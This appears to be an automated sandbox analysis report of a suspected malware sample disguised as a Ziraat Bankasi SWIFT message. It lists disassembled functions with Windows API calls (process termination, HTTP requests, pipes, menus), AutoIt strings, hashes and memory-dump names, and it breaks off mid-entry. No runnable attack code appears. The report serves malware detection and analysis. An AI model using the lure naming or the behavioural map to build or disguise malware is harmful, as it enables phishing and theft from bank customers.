Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 821859f487ffbbc093ec610e9e101a25320a1de214d6e436bb3567c8f4bf2000
Instruction ID: de1d86a58724d539577a5738bd5e6463b5954b9f6498a9470c748088cd48ad16
Opcode Fuzzy Hash: 821859f487ffbbc093ec610e9e101a25320a1de214d6e436bb3567c8f4bf2000
Instruction Fuzzy Hash: 4D214CB220420AABDB129FD4ED09BEE7BA9EB45304F044025FA41A6161C7B6DD61EB61

Function 000EEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0009AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009AFF2
Part of subcall function 0009AF83: BeginPath.GDI32(?), ref: 0009B009
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 000EEC20
LineTo.GDI32(00000000,00000003,?), ref: 000EEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEC42
LineTo.GDI32(00000000,00000000,?), ref: 000EEC52
EndPath.GDI32(00000000), ref: 000EEC62
StrokePath.GDI32(00000000), ref: 000EEC72

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 60729889175100d630aac8a7f9cf6aa20d598eccbf87b76dd15108cdb797cbf5
Instruction ID: e8c117894cba6f467ce334ebbe71b983ba2ec01ab9f12046d1c993773ae0a2de
Opcode Fuzzy Hash: 60729889175100d630aac8a7f9cf6aa20d598eccbf87b76dd15108cdb797cbf5
Instruction Fuzzy Hash: C7111B7600014DBFEF029F90EC88EEA7F6DEB08360F048122BE4999570D7B19D95DBA0

Function 000BE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000BE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 000BE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000BE1D8
ReleaseDC.USER32(00000000,00000000), ref: 000BE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 000BE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 000BE209

Part of subcall function 000B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000B9A05), ref: 000BA53A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 02e8fc8519152ef92939f51458767a3d7f9c1b89208033c7464dc99a14da6c68
Instruction ID: 75a460024443a7bcff82820176b4c8db6e34158d2df35d06368e7864126d69dc
Opcode Fuzzy Hash: 02e8fc8519152ef92939f51458767a3d7f9c1b89208033c7464dc99a14da6c68
Instruction Fuzzy Hash: F1018FB5A00214BFEB109BE6DC45B9EBFB8EB48351F004066FA08A7290DA719C00CBA0

Function 000A7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 000A7B47

Part of subcall function 000A123A: __initp_misc_winsig.LIBCMT ref: 000A125E
Part of subcall function 000A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000A7F51
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A7F65
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A7F78
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A7F8B
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A7F9E
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000A7FB1
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000A7FC4
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000A7FD7
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000A7FEA
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000A7FFD
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000A8010
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000A8023
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000A8036
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000A8049
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000A805C
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000A806F

__mtinitlocks.LIBCMT ref: 000A7B4C

Part of subcall function 000A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0013AC68,00000FA0,?,?,000A7B51,000A5E77,00136C70,00000014), ref: 000A7E41

__mtterm.LIBCMT ref: 000A7B55

Part of subcall function 000A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000A7B5A,000A5E77,00136C70,00000014), ref: 000A7D3F
Part of subcall function 000A7BBD: _free.LIBCMT ref: 000A7D46
Part of subcall function 000A7BBD: DeleteCriticalSection.KERNEL32(0013AC68,?,?,000A7B5A,000A5E77,00136C70,00000014), ref: 000A7D68

__calloc_crt.LIBCMT ref: 000A7B7A
GetCurrentThreadId.KERNEL32 ref: 000A7BA3

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: ede9ce5c097b7b5fd8e52772519ccf2f0b09fe421b6f62a78b5ccbdd4a446eb5
Instruction ID: c50d5c478a7375e7982581d2a898e457a0da413691835fac509de6a826304b90
Opcode Fuzzy Hash: ede9ce5c097b7b5fd8e52772519ccf2f0b09fe421b6f62a78b5ccbdd4a446eb5
Instruction Fuzzy Hash: F4F0907212D31219EA65B7F47C06BCB26D49F43731F2486A9F8ACC90D3FF25884141B1

Function 000827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0008281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00082825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00082830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0008283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00082843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0008284B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 0165fd5d629550198e0d70710db83f5e55196011f3a39d97e7417999cdca90cc
Instruction ID: 4296afb8b2c1afd1adc771da67b1771e721d43cf7ff799a02aff5fb00f648685
Opcode Fuzzy Hash: 0165fd5d629550198e0d70710db83f5e55196011f3a39d97e7417999cdca90cc
Instruction Fuzzy Hash: 9E0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 000C9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: f521a3bd97579be5a149aefce4a8d13c0aa4e399f144a435f6628e899f117422
Instruction ID: 3c16769e6e3efdc0ab4909cde39d1b27bf0a98f765a4df498d0081b0da2ad228
Opcode Fuzzy Hash: f521a3bd97579be5a149aefce4a8d13c0aa4e399f144a435f6628e899f117422
Instruction Fuzzy Hash: 63018132102611ABD7151B94FC4CEEF77A9FF88701B44042DF543928A4DBB4A840DB91

Function 000C7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000C7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000C7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 000C7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C4C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: faf0e98dedc54a338f8dd67319a504a580908fe0f5de121486915c26eef95531
Instruction ID: 78899d73ed1e63c356bf3315f9e24c45ba5191e6924ef594933aa09e94439101
Opcode Fuzzy Hash: faf0e98dedc54a338f8dd67319a504a580908fe0f5de121486915c26eef95531
Instruction Fuzzy Hash: AEF03A72241158BBE7215B92AC0EEEF7FBCEFC6B11F000018FA4192451EBE15A81D6B5

Function 000C9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 000C9A33
EnterCriticalSection.KERNEL32(?,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A5E

Part of subcall function 000C93D1: CloseHandle.KERNEL32(?,?,000C9A6B,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 000C9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A78

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 463b92f2a4150bfbf07618e9be5e7a304ab9b25e572e2886fad3ed8a50a31ec3
Instruction ID: 4333b7c17ade0ffbeb3b386b1ffd82b121abd5f9589a97742c96cb15a429712b
Opcode Fuzzy Hash: 463b92f2a4150bfbf07618e9be5e7a304ab9b25e572e2886fad3ed8a50a31ec3
Instruction Fuzzy Hash: 83F0B832142201ABD3112BE4FC8CEEE3779FF88302B440029F243A18A4CBB49980DBA0

Function 00081CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533

__swprintf.LIBCMT ref: 00081EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00081D49

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 2c85ca463d5b3ac72677113bf7be305238bce4e9d913f16b257847f8151e6fc5
Instruction ID: 7ba2eb45320488c05626eed129332bf255b282fd022553d5a0cbd09b42c22a7e
Opcode Fuzzy Hash: 2c85ca463d5b3ac72677113bf7be305238bce4e9d913f16b257847f8151e6fc5
Instruction Fuzzy Hash: 46916A71108205AFD724FF24C996CAEB7E8BF95700F04492DF986972A2DB30ED45DB92

Function 000DAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000DB006
CharUpperBuffW.USER32(?,?), ref: 000DB115
VariantClear.OLEAUT32(?), ref: 000DB298

Part of subcall function 000C9DC5: VariantInit.OLEAUT32(00000000), ref: 000C9E05
Part of subcall function 000C9DC5: VariantCopy.OLEAUT32(?,00000001), ref: 000C9E0E
Part of subcall function 000C9DC5: VariantClear.OLEAUT32(?), ref: 000C9E1A

Strings

Incorrect Parameter format, xrefs: 000DB03E, 000DB20B
AUTOIT.ERROR, xrefs: 000DB11B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 20e595063a9bc5df3fc3aa0a1759fe607748d4c3e811aa1751ebf53bbac8a82c
Instruction ID: ba95d0501c4610dbc1ab43c1e3d3bbb1574d3c301d58d2e8d532590a4d1b3254
Opcode Fuzzy Hash: 20e595063a9bc5df3fc3aa0a1759fe607748d4c3e811aa1751ebf53bbac8a82c
Instruction Fuzzy Hash: 28714835604301DFCB10EF24C4859AEBBE4BF89714F05496EF89A9B362DB31E945CB62

Function 000C5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717

_memset.LIBCMT ref: 000C5438
GetMenuItemInfoW.USER32(?), ref: 000C5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000C553D

Strings

0, xrefs: 000C5430

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 4c28318736609a113819fcab2c5b114dfac1ccae0f6c221d4acc6a1d6a01f2bb
Instruction ID: 268ccba4b6d6339f33b2b19b2aa4dd004e943461e0334b9317d11ff340381e25
Opcode Fuzzy Hash: 4c28318736609a113819fcab2c5b114dfac1ccae0f6c221d4acc6a1d6a01f2bb
Instruction Fuzzy Hash: D1512339504B019BD7949B28CC41FAFB7E8EF95366F04062DF895D31A1EBA0EDC08B52

Function 000C0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000C02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000C02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C0344

Strings

DllGetClassObject, xrefs: 000C02B7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 83bb1a8bf9bb56e3617659d9cecaf5457e7346deb4cd4b6e96a6b6753431b58c
Instruction ID: 758dc15a9316f10af351a136666aaa1dd6ee8ffba14ebfa92443e3e7d074758c
Opcode Fuzzy Hash: 83bb1a8bf9bb56e3617659d9cecaf5457e7346deb4cd4b6e96a6b6753431b58c
Instruction Fuzzy Hash: B9415AB1604204EFDB55CF64C884F9EBBB9EF44314F1480ADE9099F256D7B1DA45CBA0

Function 000C5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C5075
GetMenuItemInfoW.USER32 ref: 000C5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 000C50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00141708,00000000), ref: 000C5120

Strings

0, xrefs: 000C506D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: ea7cfece8572e9aa81f90e3d366d1344b2985f6b8aac5a3260e723df2599702e
Instruction ID: 5cd4556290aa18f8cdd3c49e5292223d47ed748649fd45e759a70556cf65d6a9
Opcode Fuzzy Hash: ea7cfece8572e9aa81f90e3d366d1344b2985f6b8aac5a3260e723df2599702e
Instruction Fuzzy Hash: CC418C792047019FD7209F24DC88F6EBBE4AF85325F184A1EF99597292D770A980CB62

Function 000BB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000BB88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000BB8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 000BB8D1

Strings

ListBox, xrefs: 000BB84D
ComboBox, xrefs: 000BB815

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 3e80bdfdd603e27f7a1ddca7ddac392e821cd370ac3de9a80b44cf2f9f919832
Instruction ID: 05d3e25ec59f4e7a5134631049db91f0f30ad294dceeeb56c3f9d08c41af9959
Opcode Fuzzy Hash: 3e80bdfdd603e27f7a1ddca7ddac392e821cd370ac3de9a80b44cf2f9f919832
Instruction Fuzzy Hash: D121E175900108AFEB14ABA4D886DFE77B8EF05350B144129F061A31E2DBB54D069B60

Function 000D43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000D4457
InternetCloseHandle.WININET(00000000), ref: 000D449E

Part of subcall function 000D5052: GetLastError.KERNEL32(?,?,000D43CC,00000000,00000000,00000001), ref: 000D5067

Strings

, xrefs: 000D4450

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: bdc22e181c50967eb4677eefdc3af92225a2d236c95f67fb5db25d1562fe477e
Instruction ID: 208c0a1e270488363f0c317eb36b2bbab4cfe142ad7b13848e6f103c469ffc20
Opcode Fuzzy Hash: bdc22e181c50967eb4677eefdc3af92225a2d236c95f67fb5db25d1562fe477e
Instruction Fuzzy Hash: 39218EB2500308BFE7219F94DC85EBFBAECEB48748F10801BF549A2241EA748D859B71

Function 000C9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 000C9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000C95B9
GetStdHandle.KERNEL32(0000000C), ref: 000C95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 000C9605

Strings

